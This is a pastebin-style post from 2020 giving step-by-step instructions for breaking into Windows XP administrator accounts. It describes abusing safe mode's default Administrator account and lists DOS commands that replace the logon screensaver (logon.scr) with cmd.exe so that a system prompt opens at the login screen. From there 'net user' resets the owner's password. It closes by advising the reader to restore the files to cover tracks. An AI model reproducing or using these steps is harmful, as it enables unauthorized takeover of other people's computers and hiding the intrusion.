How to hack windows admin password/login pincode


SUBMITTED BY: eort1254

DATE: Sept. 29, 2020, 4:01 p.m.

FORMAT: Text only

SIZE: 2.3 kB

HITS: 637

  1. This hack will only work if the person that owns the machine
  2. has no intelligence. This is how it works:
  3. When you or anyone installs Windows XP for the first time your
  4. asked to put in your username and up to five others.
  5. Now, unknownst to a lot of other people this is the only place in
  6. Windows XP that you can password the default Administrator Diagnostic
  7. Account. This means that to by pass most administrators accounts
  8. on Windows XP all you have to do is boot to safe mode by pressing F8
  9. during boot up and choosing it. Log into the Administrator Account
  10. and create your own or change the password on the current Account.
  11. This only works if the user on setup specified a password for the
  12. Administrator Account.
  13. This has worked for me on both Windows XP Home and Pro.
  14. -----------------------------------------------------------------------------
  15. Now this one seems to be machine dependant, it works randomly(don't know why)
  16. If you log into a limited account on your target machine and open up a dos prompt
  17. then enter this set of commands Exactly:
  18. (this appeared on www.astalavista.com a few days ago but i found that it wouldn't work
  19. on the welcome screen of a normal booted machine)
  20. -----------------------------------------------------------------------------
  21. cd\ *drops to root
  22. cd\windows\system32 *directs to the system32 dir
  23. mkdir temphack *creates the folder temphack
  24. copy logon.scr temphack\logon.scr *backsup logon.scr
  25. copy cmd.exe temphack\cmd.exe *backsup cmd.exe
  26. del logon.scr *deletes original logon.scr
  27. rename cmd.exe logon.scr *renames cmd.exe to logon.scr
  28. exit *quits dos
  29. -----------------------------------------------------------------------------
  30. Now what you have just done is told the computer to backup the command program
  31. and the screen saver file, then edits the settings so when the machine boots the
  32. screen saver you will get an unprotected dos prompt with out logging into XP.
  33. Once this happens if you enter this command minus the quotes
  34. "net user <admin account name here> password"
  35. If the Administrator Account is called Frank and you want the password blah enter this
  36. "net user Frank blah"
  37. and this changes the password on franks machine to blah and your in.
  38. Have fun
  39. p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

comments powered by Disqus